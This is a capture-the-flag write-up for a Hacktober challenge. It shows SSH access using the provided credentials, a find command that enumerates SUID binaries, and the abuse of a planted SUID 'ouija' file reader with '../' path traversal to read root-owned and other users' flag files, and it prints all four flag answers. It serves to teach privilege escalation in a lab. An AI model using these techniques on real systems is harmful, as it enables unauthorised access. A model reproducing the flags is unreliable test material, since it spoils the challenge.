# Talking To The Dead ```bash Author: syyntax We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc). Submit the contents of flag1.txt. ssh hacktober@env.hacktober.io Password: hacktober-Underdog-Truth-Glimpse ``` ## Flags 1 and 2: SSHing in and running the command `whoami` we see we're logged in as `luciafer`. Navigating to `/home/luciafer/Documents`, I ran `ls -alt` and the output was as follows: ```bash luciafer@40504779afeb:~/Documents$ ls -alt total 20 drwxrwxr-x 1 luciafer luciafer 4096 Oct 6 08:36 . -rw-rw-r-- 1 luciafer luciafer 47 Oct 6 08:36 .flag2.txt -rw-rw-r-- 1 luciafer luciafer 47 Oct 5 14:55 flag1.txt drwxr-xr-x 1 luciafer luciafer 4096 Oct 5 14:54 .. ``` Since `luciafer` owns both these files, I can simply run `cat flag1.txt` and `cat .flag2.txt` to get the flags. flag 1: `flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c}`\ flag 2: `flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}` ## Flags 3 and 4: After looking around, I found flag3.txt located at `/home/spookyboi/Documents/flag3.txt` and flag4.txt at `/root/flag4.txt`. Since luciafer doesn't have sufficient perms to read these files, I ran the command\ `find / -perm -u=s -type f 2>/dev/null` to find SUID files. SUID is a special file permission for executable files, which enables other users to run the file with effective permissions of the file owner. This means we could privilege escalate to root or a higher privileged user, giving us perms to read the flag files. This was the output: ```bash luciafer@40504779afeb:/root$ find / -perm -u=s -type f 2>/dev/null /usr/bin/umount /usr/bin/passwd /usr/bin/mount /usr/bin/gpasswd /usr/bin/su /usr/bin/chsh /usr/bin/newgrp /usr/bin/chfn /usr/local/bin/ouija /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper ``` The program `ouija` jumped out to me, so i tried running it: ```bash luciafer@40504779afeb:/root$ /usr/local/bin/ouija OUIJA 6.66 - Read files in the /root directory Usage: ouija [FILENAME] EXAMPLES: ouija file.txt ouija read.meluciafer@40504779afeb:/root$ ``` Excellent! it reads files in the `/root` directory, meaning we simply go ``` luciafer@40504779afeb:/root$ /usr/local/bin/ouija flag4.txt flag{4781cbffd13df6622565d45e790b4aac2a4054dc} ``` We use the same program to get the flag from flag3.txt as so: ``` luciafer@40504779afeb:/root$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt flag{445b987b5b80e445c3147314dbfa71acd79c2b67} ``` Note: as we start in the `/root` directory, so must go back one (`../`) to navigate to flag3.txt. By das